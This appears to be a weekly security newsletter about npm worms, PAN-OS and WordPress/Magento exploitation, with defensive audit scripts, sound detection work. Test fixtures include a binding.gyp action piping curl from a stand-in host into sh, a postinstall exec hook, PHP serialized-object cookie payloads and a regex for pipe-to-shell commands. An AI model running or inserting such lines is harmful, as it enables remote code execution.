fruition.net
The Perimeter · Issue 06-12-2026

npm worms keep coming, PAN-OS exploited, WordPress plugins under active attack

The npm ecosystem absorbed another wave of self-propagating malware this week. The Shai-Hulud miasma variant expanded to 304+ packages, a new node-gyp-abusing worm hides in binding.gyp, and the @redhat-cloud-services namespace was hijacked. If your CI builds touch npm, treat install-time as hostile execution. On the perimeter, CISA added PAN-OS CVE-2026-0257 (authentication bypass, actively exploited) and a Mirasvit Magento PHP-deserialization RCE to KEV. WordPress operators get a triple: Everest Forms Pro, Burst Statistics, and Kirki are all under active exploitation, with Kirki affecting ~150k sites via unauthenticated account takeover. Recalculate: assume any developer workstation that ran `npm install` in the past two weeks is potentially compromised, and audit your WordPress plugin inventory against this week's actively-exploited list before Friday.
Published: Friday, June 12, 2026
Entries: 12
Cadence: Weekly · Fridays
Curator: Brad Anderson
Wire
cisa.gov New addition to the Known Exploited Vulnerabilities catalog ·
github.com GHSA: critical npm package compromise affecting CI pipelines ·
wordfence.com WordPress plugin vulnerability with active exploitation ·
drupal.org Highly critical core security advisory published ·
aws.amazon.com AWS security bulletin: IAM policy evaluation update ·
unit42.paloaltonetworks.com Threat actor expands toolkit targeting public-facing PHP apps ·
krebsonsecurity.com Breach disclosure with named victim and confirmed initial vector ·
snyk.io Composer dependency advisory affecting production framework versions ·
01

Web Application

frameworks · browsers · authentication flows

no entries this week

02

Supply Chain

packages · build systems · dependency attacks

▲ headline

Shai-Hulud miasma wave expands to 304 npm packages

Sonatype is tracking a new wave of the self-propagating Shai-Hulud worm, now confirmed in 304 npm components as of June 5. The malware steals developer credentials at install time and uses them to republish further infected packages, including via the @redhat-cloud-services namespace hijack reported June 1. Unit 42 separately documents CI/CD persistence and multi-stage payloads in the post-Shai-Hulud landscape.

npm @redhat-cloud-services GitHub Actions
Fruition take

Treat any workstation or CI runner that executed `npm install` since late May as suspect. Rotate npm tokens, GitHub PATs, and any cloud credentials reachable from build environments; pin and review @redhat-cloud-services and other namespace dependencies in lockfiles.

Node-gyp worm hides in binding.gyp to bypass lifecycle-script defenses

Snyk documents an npm worm that abuses binding.gyp to trigger node-gyp during install, executing attacker code without using the lifecycle scripts (preinstall/postinstall) that most defenders monitor or disable. The payload steals credentials, persists via GitHub, and republishes from compromised maintainer accounts.

npm node-gyp
Fruition take

Disabling npm lifecycle scripts (`--ignore-scripts`) is no longer sufficient. Audit installed packages with native components for unexpected binding.gyp behavior and constrain CI builds to ephemeral runners with no long-lived credentials in env.
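The audit both takes above ask for, as an added example (this is not Fruition's, Sonatype's or Snyk's tooling): walk a node_modules tree and report every install-time execution path, meaning the lifecycle hooks that run on install and any binding.gyp, whose presence makes npm run `node-gyp rebuild` implicitly and whose gyp `actions` entries execute arbitrary commands during configure/build. gyp files are Python dict literals, so they are parsed with `ast.literal_eval`. The three packages in the fixture are constructed, and the "suspicious" flag is a heuristic (network fetch, pipe-to-shell, inline `node -e`, base64/eval), not a verdict.

```python
"""Audit the install-time execution surface of a node_modules tree (added
example, not Fruition's or Snyk's tooling). Reports lifecycle hooks that run
on install and binding.gyp files, whose presence makes npm run
`node-gyp rebuild` implicitly and whose gyp `actions` can run arbitrary
commands during configure/build."""
import ast
import json
import os
import re
import tempfile

INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Heuristics for commands worth a human look: network fetches, pipe-to-shell,
# inline node evaluation, base64/eval staging.
SUSPICIOUS = re.compile(r"\b(curl|wget)\b|\|\s*(sh|bash)\b|\b(base64|eval)\b|\bnode\s+-e\b")


def parse_gyp(text):
    """gyp files are Python dict literals (gyp itself eval()s them), so
    ast.literal_eval handles single quotes, trailing commas and nesting;
    full-line # comments are stripped first because literal_eval rejects them."""
    no_comments = re.sub(r"(?m)^\s*#.*$", "", text)
    return ast.literal_eval(no_comments.strip())


def gyp_actions(gyp):
    """Yield (target_name, command) for each action, including those nested in
    per-platform 'conditions' blocks ([['OS==\"win\"', {...}], ...])."""
    for target in gyp.get("targets", []):
        blocks = [target] + [b for cond in target.get("conditions", [])
                             for b in cond[1:] if isinstance(b, dict)]
        for block in blocks:
            for action in block.get("actions", []):
                yield target.get("target_name", "?"), " ".join(map(str, action.get("action", [])))


def audit_package(pkg_dir):
    with open(os.path.join(pkg_dir, "package.json"), encoding="utf-8") as f:
        pkg = json.load(f)
    name = pkg.get("name", os.path.basename(pkg_dir))
    findings = []
    for hook in INSTALL_HOOKS:
        cmd = pkg.get("scripts", {}).get(hook)
        if cmd:
            findings.append({"package": name, "kind": "lifecycle:" + hook,
                             "command": cmd, "suspicious": bool(SUSPICIOUS.search(cmd))})
    gyp_path = os.path.join(pkg_dir, "binding.gyp")
    if os.path.isfile(gyp_path):
        findings.append({"package": name, "kind": "binding.gyp",
                         "command": "implicit `node-gyp rebuild` on install", "suspicious": False})
        with open(gyp_path, encoding="utf-8") as f:
            for target, cmd in gyp_actions(parse_gyp(f.read())):
                findings.append({"package": name, "kind": "gyp-action:" + target,
                                 "command": cmd, "suspicious": bool(SUSPICIOUS.search(cmd))})
    return findings


def iter_packages(node_modules):
    """Yield package directories, descending into @scopes and nested node_modules."""
    for entry in sorted(os.listdir(node_modules)):
        if entry.startswith("."):
            continue
        path = os.path.join(node_modules, entry)
        candidates = [os.path.join(path, s) for s in sorted(os.listdir(path))] if entry.startswith("@") else [path]
        for pkg_dir in candidates:
            if os.path.isfile(os.path.join(pkg_dir, "package.json")):
                yield pkg_dir
                nested = os.path.join(pkg_dir, "node_modules")
                if os.path.isdir(nested):
                    yield from iter_packages(nested)


def audit_node_modules(node_modules):
    return [f for pkg_dir in iter_packages(node_modules) for f in audit_package(pkg_dir)]


# Constructed fixture: a clean package, one with a postinstall hook, and a
# scoped package whose binding.gyp fetches and runs a remote script.
GYP_FIXTURE = """# constructed for this example
{
  'targets': [{
    'target_name': 'thing',
    'sources': ['src/thing.cc'],
    'actions': [{
      'action_name': 'fetch_prebuilt',
      'inputs': [],
      'outputs': ['build/prebuilt.node'],
      'action': ['sh', '-c', 'curl -s http://example.invalid/p | sh'],
    }],
  }],
}
"""


def build_fixture(root):
    def write(rel, content):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as f:
            f.write(content)
    write("node_modules/pad-left-clean/package.json",
          json.dumps({"name": "pad-left-clean", "version": "1.0.0"}))
    write("node_modules/hooky/package.json",
          json.dumps({"name": "hooky", "version": "2.1.0",
                      "scripts": {"postinstall": "node -e \"require('child_process').exec(process.env.X)\""}}))
    write("node_modules/@acme/native-thing/package.json",
          json.dumps({"name": "@acme/native-thing", "version": "0.3.1"}))
    write("node_modules/@acme/native-thing/binding.gyp", GYP_FIXTURE)


def demo():
    with tempfile.TemporaryDirectory() as tmp:
        build_fixture(tmp)
        return audit_node_modules(os.path.join(tmp, "node_modules"))


if __name__ == "__main__":
    for f in demo():
        print(("!! " if f["suspicious"] else "   ") + f"{f['package']:<22} {f['kind']:<24} {f['command']}")
```

Run it against a real checkout with `audit_node_modules("./node_modules")`. Every package that has a binding.gyp shows up whether or not it is malicious; the point is that those packages need the same review you already give install hooks, and a gyp action that touches the network is never normal.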

03

Infrastructure

kubernetes · cloud · network · ingress

Kubernetes SRC corrects records for four unfixed CVEs, will surface in scanners June 1

The Kubernetes Security Response Committee is correcting the CVE records for CVE-2020-8554, CVE-2020-8561, CVE-2020-8562, and CVE-2021-25740 to remove inaccurate fixed-version metadata. Scanners that trusted that metadata may begin flagging these in clusters that previously appeared clean. The underlying issues (externalIPs man-in-the-middle, kube-apiserver webhook redirect, API-server proxy localhost TOCTOU, and cross-namespace traffic forwarding via Endpoints/EndpointSlice) remain unfixed by design and require operator-side mitigations.

Fruition take

Expect cluster scanners to light up after June 1. Pre-empt the noise: document the RBAC restrictions on Service.spec.externalIPs and on create/update of Endpoints and EndpointSlices across your fleet, and confirm an admission policy rejects externalIPs (or restricts them to an allowlist), so the findings can be closed as mitigated rather than re-triaged.
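As an added example (not Kubernetes SRC tooling), the Python script below audits the state this take asks you to document, offline, over the JSON that `kubectl get svc,roles,clusterroles,rolebindings,clusterrolebindings -A -o json` produces: Services that set spec.externalIPs (the CVE-2020-8554 surface) and Roles/ClusterRoles whose rules allow writing Endpoints or EndpointSlices (the CVE-2021-25740 surface), joined to the subjects bound to them. The fixture objects, names and IPs are constructed; built-in `system:*` roles are skipped on the assumption that the controllers behind them legitimately need the permission.

```python
"""Offline audit of operator-side mitigations for the unfixed Kubernetes CVEs
(added example, not SRC tooling). Input: kubectl List JSON (or a list of
objects). Flags Services using spec.externalIPs (CVE-2020-8554) and RBAC
rules letting non-system subjects write Endpoints/EndpointSlices
(CVE-2021-25740), with the subjects bound to those roles."""
import json
from collections import defaultdict

WRITE_VERBS = {"create", "update", "patch", "*"}
ENDPOINT_RESOURCES = {("", "endpoints"), ("discovery.k8s.io", "endpointslices")}


def items(kubectl_json):
    """Accept a kubectl List (JSON text or dict) or a plain list of objects."""
    data = json.loads(kubectl_json) if isinstance(kubectl_json, str) else kubectl_json
    return data.get("items", []) if isinstance(data, dict) else data


def services_with_external_ips(objs):
    return [{"namespace": o["metadata"].get("namespace"), "name": o["metadata"]["name"],
             "externalIPs": o["spec"]["externalIPs"]}
            for o in objs if o.get("kind") == "Service" and o.get("spec", {}).get("externalIPs")]


def rule_writes_endpoints(rule):
    groups, resources = set(rule.get("apiGroups", [])), set(rule.get("resources", []))
    if not set(rule.get("verbs", [])) & WRITE_VERBS:
        return False
    return any((g in groups or "*" in groups) and (r in resources or "*" in resources)
               for g, r in ENDPOINT_RESOURCES)


def subjects_by_role(objs):
    """Index binding subjects by (roleRef kind, roleRef name)."""
    index = defaultdict(list)
    for o in objs:
        if o.get("kind") in ("RoleBinding", "ClusterRoleBinding"):
            ref = o["roleRef"]
            for s in o.get("subjects", []):
                ns = s.get("namespace")
                index[(ref["kind"], ref["name"])].append(f"{s['kind']}:{ns + '/' if ns else ''}{s['name']}")
    return index


def endpoint_writers(objs):
    """Roles/ClusterRoles (excluding built-in system:* ones, assumed legitimate)
    whose rules allow writing Endpoints or EndpointSlices, plus bound subjects."""
    bound = subjects_by_role(objs)
    hits = []
    for o in objs:
        if o.get("kind") not in ("Role", "ClusterRole") or o["metadata"]["name"].startswith("system:"):
            continue
        offending = [r for r in o.get("rules", []) if rule_writes_endpoints(r)]
        if offending:
            hits.append({"kind": o["kind"], "name": o["metadata"]["name"],
                         "namespace": o["metadata"].get("namespace"),
                         "rules": offending, "subjects": bound[(o["kind"], o["metadata"]["name"])]})
    return hits


def audit(kubectl_json):
    objs = items(kubectl_json)
    return {"external_ips": services_with_external_ips(objs), "endpoint_writers": endpoint_writers(objs)}


# Constructed fixture shaped like kubectl output; names and IPs are invented.
FIXTURE = {"kind": "List", "items": [
    {"kind": "Service", "metadata": {"namespace": "shop", "name": "checkout"},
     "spec": {"type": "ClusterIP", "externalIPs": ["203.0.113.10"]}},
    {"kind": "Service", "metadata": {"namespace": "shop", "name": "catalog"},
     "spec": {"type": "ClusterIP"}},
    {"kind": "ClusterRole", "metadata": {"name": "edit"},
     "rules": [{"apiGroups": [""], "resources": ["endpoints", "services"],
                "verbs": ["create", "delete", "get", "patch", "update"]}]},
    {"kind": "ClusterRole", "metadata": {"name": "system:controller:endpoint-controller"},
     "rules": [{"apiGroups": [""], "resources": ["endpoints"], "verbs": ["create", "update"]}]},
    {"kind": "Role", "metadata": {"namespace": "shop", "name": "app-deployer"},
     "rules": [{"apiGroups": ["discovery.k8s.io"], "resources": ["endpointslices"], "verbs": ["*"]}]},
    {"kind": "RoleBinding", "metadata": {"namespace": "shop", "name": "ci-deploys"},
     "roleRef": {"kind": "Role", "name": "app-deployer"},
     "subjects": [{"kind": "ServiceAccount", "namespace": "shop", "name": "ci"}]},
]}


if __name__ == "__main__":
    print(json.dumps(audit(FIXTURE), indent=2))
```

Expect the stock `edit` and `admin` ClusterRoles to appear, since they grant Endpoints write by default; the useful output is who is bound to them. Enforcement (a ValidatingAdmissionPolicy or webhook that rejects externalIPs) is separate from this audit and is what closes the finding.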

KnowledgeDeliver ViewState deserialization zero-day (CVE-2026-5426) exploited in the wild

Mandiant disclosed CVE-2026-5426, an unauthenticated RCE in KnowledgeDeliver LMS caused by identical pre-shared ASP.NET machine keys across customer deployments, allowing ViewState deserialization attacks. It was exploited as a zero-day to compromise an LMS host and inject malicious code served to visitors.

CVE-2026-5426 KnowledgeDeliver ASP.NET
Fruition take

Any ASP.NET application that ships with a vendor-default machineKey is one disclosure away from this same outcome. Audit web.config files in IIS deployments for machineKey values shared across deployments that should be independent, rotate them to freshly generated per-deployment keys, and confirm ViewState MAC validation has not been disabled anywhere along the way.
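The web.config sweep described above, as an added example (not Mandiant's tooling): parse each file, collect `<machineKey>` validationKey/decryptionKey pairs, report any pair used by more than one site, and separately report `<pages enableViewStateMac="false">`, which makes ViewState deserialization exploitable with no key at all. `AutoGenerate` keys are skipped because they are per machine and cannot be a cross-deployment secret. The four configs in the fixture are constructed and the hex keys are placeholders.

```python
"""Audit IIS web.config files for ASP.NET machineKey reuse and disabled
ViewState MAC (added example, not Mandiant's tooling). A key pair shared by
deployments that should be independent means one leaked key set is a
ViewState-deserialization RCE against all of them."""
import os
import xml.etree.ElementTree as ET
from collections import defaultdict

AUTOGEN = "AUTOGENERATE"  # ASP.NET's per-machine default, e.g. "AutoGenerate,IsolateApps"


def extract(xml_text):
    """Return ([(validationKey, decryptionKey), ...], viewstate_mac_disabled)."""
    root = ET.fromstring(xml_text)
    keys = [(mk.get("validationKey", "AutoGenerate"), mk.get("decryptionKey", "AutoGenerate"))
            for mk in root.iter("machineKey")]
    mac_disabled = any(p.get("enableViewStateMac", "true").lower() == "false" for p in root.iter("pages"))
    return keys, mac_disabled


def audit(configs):
    """configs: {site_label: web.config text}. Reports key pairs used by more
    than one site and sites with ViewState MAC turned off."""
    by_keys, mac_off = defaultdict(list), []
    for site, text in configs.items():
        keys, mac_disabled = extract(text)
        if mac_disabled:
            mac_off.append(site)
        for vk, dk in keys:
            if AUTOGEN in vk.upper() or AUTOGEN in dk.upper():
                continue  # generated per machine; not a cross-deployment secret
            by_keys[(vk.upper(), dk.upper())].append(site)  # hex keys compare case-insensitively
    shared = [{"sites": sorted(sites), "validationKey": vk[:16] + "...", "decryptionKey": dk[:16] + "..."}
              for (vk, dk), sites in by_keys.items() if len(sites) > 1]
    return {"shared_keys": shared, "viewstate_mac_disabled": sorted(mac_off)}


def collect_web_configs(root):
    """Walk a tree (e.g. C:\\inetpub) and load every web.config, labelled by
    its directory relative to root; feed the result to audit()."""
    found = {}
    for dirpath, _, filenames in os.walk(root):
        if "web.config" in filenames:
            with open(os.path.join(dirpath, "web.config"), encoding="utf-8-sig") as f:
                found[os.path.relpath(dirpath, root)] = f.read()
    return found


# Constructed web.config fragments; the keys are placeholder hex, not real secrets.
def _cfg(machine_key_attrs, pages_attrs=""):
    return (f"<configuration><system.web><machineKey {machine_key_attrs}/>"
            f"<pages {pages_attrs}/></system.web></configuration>")


VK1, DK1 = "0123456789ABCDEF" * 8, "FEDCBA9876543210" * 4
VK2, DK2 = "00FF" * 32, "11EE" * 16
FIXTURE = {
    "vendor-site-a": _cfg(f'validationKey="{VK1}" decryptionKey="{DK1}" validation="HMACSHA256" decryption="AES"'),
    "vendor-site-b": _cfg(f'validationKey="{VK1.lower()}" decryptionKey="{DK1}" validation="HMACSHA256" decryption="AES"'),
    "intranet": _cfg('validationKey="AutoGenerate,IsolateApps" decryptionKey="AutoGenerate,IsolateApps"'),
    "legacy": _cfg(f'validationKey="{VK2}" decryptionKey="{DK2}" validation="SHA1" decryption="AES"',
                   'enableViewStateMac="false"'),
}


if __name__ == "__main__":
    import json
    print(json.dumps(audit(FIXTURE), indent=2))
```

Keys shared across the nodes of your own web farm are intentional and will also show up here; the reviewer decides whether a group is one farm or several unrelated customers of one vendor. Only the latter is the KnowledgeDeliver pattern.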

04

PHP & CMS

wordpress · drupal · plugins · php frameworks

github.com 1d CVSS 8.8

Twig sandbox bypass via source policy enables arbitrary PHP callables

CVE-2026-24425 (CVSS 8.8): when Twig's sandbox is enabled via a SourcePolicyInterface rather than globally, the runtime check that rejects non-Closure callbacks on sort/filter/map/reduce fails to consult the current template Source. Sandboxed templates can pass arbitrary PHP callables, breaking the sandbox boundary. Additional toString and XSS issues (CVE-2026-47732, CVE-2026-47730) were patched concurrently.

Fruition take

Drupal and Symfony stacks that allow user-authored Twig templates (multi-tenant CMS, email templating) should patch this week. If you rely on the sandbox via a source policy specifically, treat any prior tenant-supplied template as potentially malicious until reviewed.

Everest Forms Pro RCE under active exploitation

Wordfence confirms in-the-wild exploitation of a critical unauthenticated remote code execution vulnerability disclosed March 30 in Everest Forms Pro (~4,000 active installs). Sites that have not updated since disclosure should be considered potentially compromised.

Everest Forms Pro
Fruition take

If you run Everest Forms Pro on any client site, patch immediately and review for new admin users, modified theme files, and unexpected wp-content/uploads PHP files written since April.

nvd.nist.gov this week KEV

CISA adds Mirasvit Magento PHP-deserialization RCE to KEV

CVE-2026-45247 in Mirasvit's Full Page Cache Warmer for Magento allows unauthenticated remote code execution via a crafted serialized PHP object delivered in the CacheWarmer cookie. CISA added it to KEV on June 3 based on confirmed exploitation.

CVE-2026-45247 Mirasvit Full Page Cache Warmer Magento
Fruition take

If any Magento storefront in scope uses Mirasvit Full Page Cache Warmer, patch or remove it this week. If your access logs capture the Cookie header (the stock combined format does not), grep them for CacheWarmer cookie values containing serialized-object markers (`O:`, `a:`), bearing in mind the value may arrive URL-encoded or base64-wrapped.
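The log check described above, as an added example (not Mirasvit's or CISA's tooling): parse each access-log line, pull the CacheWarmer cookie, URL-decode it, and look for PHP `serialize()` markers (`O:<len>:"Class"`, `C:<len>:"Class"`, `a:<n>:{`), also after base64-decoding values that look encoded. It assumes a log format that appends the Cookie header as a final quoted field (nginx `"$http_cookie"` or Apache `"%{Cookie}i"`). The four log lines are constructed; the payload class names are invented.

```python
"""Scan access logs for CacheWarmer cookies carrying PHP-serialized payloads
(added example, not Mirasvit's or CISA's tooling). Assumes the Cookie header
is logged as the final quoted field; the default combined format omits it."""
import base64
import binascii
import re
from urllib.parse import unquote

LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3}) '
                  r'\S+ "[^"]*" "(?P<ua>[^"]*)" "(?P<cookies>[^"]*)"\s*$')
# serialize() output: O:<len>:"Class":<n>:{...}, C:<len>:"Class":..., a:<n>:{...}
PHP_OBJECT = re.compile(r'(?:^|[;{:\s])[OC]:\d+:"[A-Za-z_\\][A-Za-z0-9_\\]*"')
PHP_ARRAY = re.compile(r'(?:^|[;{:\s])a:\d+:\{')
B64ISH = re.compile(r"^[A-Za-z0-9+/_=-]{8,}$")


def parse_cookies(header):
    out = {}
    for part in header.split(";"):
        name, _, value = part.strip().partition("=")
        if name:
            out[name] = value
    return out


def serialized_kind(value):
    """Return 'php-object', 'php-array', a 'base64:'-prefixed variant, or None."""
    decoded = unquote(value)
    if PHP_OBJECT.search(decoded):
        return "php-object"
    if PHP_ARRAY.search(decoded):
        return "php-array"
    if B64ISH.match(decoded):
        try:  # accept URL-safe alphabet and missing padding, reject anything else
            raw = base64.b64decode(decoded.replace("-", "+").replace("_", "/") + "=" * (-len(decoded) % 4),
                                   validate=True).decode("latin-1")
        except (binascii.Error, ValueError):
            return None
        inner = serialized_kind(raw)
        return "base64:" + inner if inner else None
    return None


def scan_lines(lines, cookie_name="CacheWarmer"):
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        value = parse_cookies(m["cookies"]).get(cookie_name)
        if value is None:
            continue
        kind = serialized_kind(value)
        if kind:
            hits.append({"ip": m["ip"], "time": m["time"], "request": m["request"],
                         "kind": kind, "cookie": value[:80]})
    return hits


# Constructed log lines; IPs are documentation ranges, payload class names invented.
PAYLOAD_URLENC = "O%3A8%3A%22Evil_Obj%22%3A1%3A%7Bs%3A3%3A%22cmd%22%3Bs%3A2%3A%22id%22%3B%7D"
PAYLOAD_B64 = base64.b64encode(b'a:1:{i:0;O:4:"Evil":0:{}}').decode()
SAMPLE_LOG = [
    '203.0.113.5 - - [03/Jun/2026:10:14:02 +0000] "GET /catalog/category/view/id/12 HTTP/1.1" 200 8123 "-" '
    '"Mozilla/5.0" "PHPSESSID=s3ssion; CacheWarmer=1"',
    f'198.51.100.23 - - [03/Jun/2026:10:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" "python-requests/2.31" '
    f'"CacheWarmer={PAYLOAD_URLENC}"',
    f'198.51.100.23 - - [03/Jun/2026:10:15:41 +0000] "GET /checkout/cart/ HTTP/1.1" 500 0 "-" "curl/8.5.0" '
    f'"form_key=abc; CacheWarmer={PAYLOAD_B64}"',
    '203.0.113.9 - - [03/Jun/2026:10:16:00 +0000] "GET /media/logo.png HTTP/1.1" 200 4411 "-" "Mozilla/5.0" "-"',
]


if __name__ == "__main__":
    for h in scan_lines(SAMPLE_LOG):
        print(f"{h['time']} {h['ip']:<15} {h['kind']:<18} {h['request']}  cookie={h['cookie']}")
```

Point it at a real file with `scan_lines(open("access.log"))`. A hit proves an attempt, not success; pair the source IP and timestamp with PHP error logs and any new files under `var/` or `pub/` to decide whether the deserialization landed.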

wordfence.com this week

Burst Statistics authentication bypass exploited on 200k WordPress sites

Wordfence reports active exploitation of a critical authentication bypass in Burst Statistics (200,000 installs). Unauthenticated attackers with knowledge of an admin username can impersonate that account and achieve full site takeover. Patched May 13; exploitation began shortly after disclosure.

Burst Statistics
Fruition take

Update Burst Statistics now and audit the user list for unexpected admin role changes, and login or session records from new IPs, over the past three weeks.

wordfence.com this week

Unauthenticated privilege escalation in Kirki affects ~150k WordPress sites

Wordfence disclosed an unauthenticated privilege escalation in the Kirki WordPress plugin, introduced in the 6.0 release. Attackers can abuse the password reset flow to take over arbitrary accounts including administrators. Of the 500k+ installs, ~150k are running affected 6.x versions.

Kirki WordPress plugin
Fruition take

Inventory WordPress sites for Kirki >= 6.0, update immediately, and force a password reset on admin accounts. Customizer-heavy themes frequently bundle Kirki — check theme-vendored copies too.
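The inventory the Everest Forms Pro and Kirki takes above call for, as one added example (not Wordfence's tooling): read the plugin header of each installed plugin's main file, find Kirki copies vendored inside themes (assumed to keep their `kirki.php` entry file and header), flag Kirki at 6.0 or later as the advisory states, and list every PHP file under wp-content/uploads with whether it was written since a given date. Burst Statistics and Everest Forms Pro are reported for manual version review because the issue does not give their fixed versions. The site tree, plugin versions and file names in the fixture are constructed.

```python
"""Inventory WordPress plugin versions, including Kirki copies vendored in
themes, and list PHP files under wp-content/uploads (added example for the
Kirki, Burst Statistics and Everest Forms Pro actions above; not Wordfence
tooling). Kirki is flagged at >= 6.0 per the advisory; the other two are
reported for manual review because their fixed versions are not given here."""
import os
import re
import tempfile
from datetime import datetime

HEADER = re.compile(r"^[\s*#]*(Plugin Name|Version):\s*(.+?)\s*$", re.M)
PHP_EXT = (".php", ".phtml", ".php5", ".php7", ".phar")


def read_header(path):
    """Plugin headers sit in the first comment block; WordPress reads 8 KiB too."""
    with open(path, encoding="utf-8", errors="replace") as f:
        return dict(HEADER.findall(f.read(8192)))


def version_tuple(v):
    return tuple(int(p) if p.isdigit() else 0 for p in re.split(r"[.\-]", v))


WATCHLIST = {  # case-insensitive substring of Plugin Name -> action for a version
    "kirki": lambda v: "update (affected 6.x)" if version_tuple(v) >= (6, 0) else "ok (pre-6.0)",
    "burst statistics": lambda v: "verify against May 13 fix",
    "everest forms pro": lambda v: "verify against March 30 fix; treat as compromised if unpatched",
}


def main_plugin_files(plugins_dir):
    """(plugin_dir_name, header) for each installed plugin's main file."""
    for plugin in sorted(os.listdir(plugins_dir)) if os.path.isdir(plugins_dir) else []:
        pdir = os.path.join(plugins_dir, plugin)
        for fn in sorted(os.listdir(pdir)) if os.path.isdir(pdir) else []:
            if fn.endswith(".php"):
                header = read_header(os.path.join(pdir, fn))
                if "Plugin Name" in header:
                    yield plugin, header
                    break


def vendored_kirki(themes_dir):
    """Assumes a vendored copy keeps its kirki.php entry file and plugin header."""
    for dirpath, _, filenames in os.walk(themes_dir):
        if "kirki.php" in filenames:
            header = read_header(os.path.join(dirpath, "kirki.php"))
            if "kirki" in header.get("Plugin Name", "").lower():
                yield os.path.join(dirpath, "kirki.php"), header


def inventory(site_root, php_since):
    wp = os.path.join(site_root, "wp-content")
    found = [("plugin", p, h) for p, h in main_plugin_files(os.path.join(wp, "plugins"))]
    found += [("theme-vendored", os.path.relpath(path, site_root), h)
              for path, h in vendored_kirki(os.path.join(wp, "themes"))]
    watch = [{"where": where, "location": loc, "name": h["Plugin Name"], "version": h.get("Version", "0"),
              "action": decide(h.get("Version", "0"))}
             for where, loc, h in found for needle, decide in WATCHLIST.items()
             if needle in h["Plugin Name"].lower()]
    uploads = []
    for dirpath, _, filenames in os.walk(os.path.join(wp, "uploads")):
        for fn in filenames:
            if fn.lower().endswith(PHP_EXT):  # PHP should never live under uploads at all
                path = os.path.join(dirpath, fn)
                mtime = datetime.fromtimestamp(os.path.getmtime(path))
                uploads.append({"path": os.path.relpath(path, site_root),
                                "mtime": mtime.isoformat(), "recent": mtime >= php_since})
    return {"watchlist": watch, "uploads_php": sorted(uploads, key=lambda u: u["path"])}


def _plugin_file(name, version):
    return f"<?php\n/**\n * Plugin Name: {name}\n * Version: {version}\n */\n"


def build_fixture(root):
    """Constructed site tree; plugin versions, file names and mtimes are invented."""
    installed, files = datetime(2026, 3, 2), {
        "wp-content/plugins/kirki/kirki.php": _plugin_file("Kirki Customizer Framework", "6.1.0"),
        "wp-content/plugins/burst-statistics/burst.php": _plugin_file("Burst Statistics", "2.0.0"),
        "wp-content/plugins/hello/hello.php": _plugin_file("Hello Dolly", "1.7"),
        "wp-content/themes/acme/inc/kirki/kirki.php": _plugin_file("Kirki Customizer Framework", "5.1.0"),
        "wp-content/uploads/2026/05/logo.jpg": "",
    }
    written = {"wp-content/uploads/2026/05/wp-cache.php": ("<?php // stand-in for a dropped web shell\n", datetime(2026, 5, 20)),
               "wp-content/uploads/2026/01/old.php": ("<?php // pre-existing file\n", datetime(2026, 1, 5))}
    for rel, (content, when) in {**{k: (v, installed) for k, v in files.items()}, **written}.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as f:
            f.write(content)
        os.utime(path, (when.timestamp(), when.timestamp()))


def demo(since=datetime(2026, 4, 1)):
    with tempfile.TemporaryDirectory() as tmp:
        build_fixture(tmp)
        return inventory(tmp, since)


if __name__ == "__main__":
    r = demo()
    for w in r["watchlist"]:
        print(f"{w['where']:<15} {w['location']:<36} {w['name']} {w['version']}: {w['action']}")
    for u in r["uploads_php"]:
        print(("RECENT " if u["recent"] else "       ") + f"{u['path']} ({u['mtime']})")
```

Run `inventory("/var/www/site", datetime(2026, 4, 1))` per site. Any PHP file under uploads is worth a look regardless of date; the `recent` flag only orders the review. For the Burst Statistics session audit the take asks for, the user table and login records need database or plugin access that this file-level sweep does not have.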

05

Identity & Auth

oauth · saml · iam · session attacks

no entries this week

06

Threat Intel

active exploitation · breaches · ransomware

▲ headline

PAN-OS CVE-2026-0257 authentication bypass under active exploitation, added to KEV

Unit 42 confirms active exploitation of CVE-2026-0257, an authentication bypass in PAN-OS that lets attackers establish unauthorized VPN connections without credentials. CISA added it to the KEV catalog on May 29. Indicators and mitigation guidance are published; Palo Alto has fixes available.

CVE-2026-0257 Palo Alto Networks PAN-OS GlobalProtect
Fruition take

If you run PAN-OS as a perimeter or remote-access gateway for any client environment, patch this week and pull GlobalProtect logs for unexpected portal logins since mid-May.

Mandiant: UNC3753 (Luna Moth) vishing campaign hitting US law and finance firms

Mandiant attributes a January–May 2026 extortion campaign against dozens of US professional services, legal, and financial organizations to UNC3753 (Luna Moth / Silent Ransom Group). Initial access is voice-phishing of staff into installing legitimate RMM tools under a fake IT-support or invoice pretext, then exfiltration and extortion without ransomware deployment.

Fruition take

If you operate client portals for legal or financial firms, ensure RMM tools (AnyDesk, Atera, ScreenConnect, Zoho Assist) are explicitly allowlisted at the endpoint and blocked by default. Brief support staff that screen-share-during-a-cold-call is the current attack pattern.

Internet-exposed fuel tank gauges attacked at US gas stations

Dark Reading reports active attacks against internet-exposed Automatic Tank Gauges at US gas stations, with threat actors using the access for operational disruption. The exposure pattern (Modbus/TCP and Veeder-Root protocol on public IPs) has been documented for years but is now being exploited at scale.

Automatic Tank Gauges Veeder-Root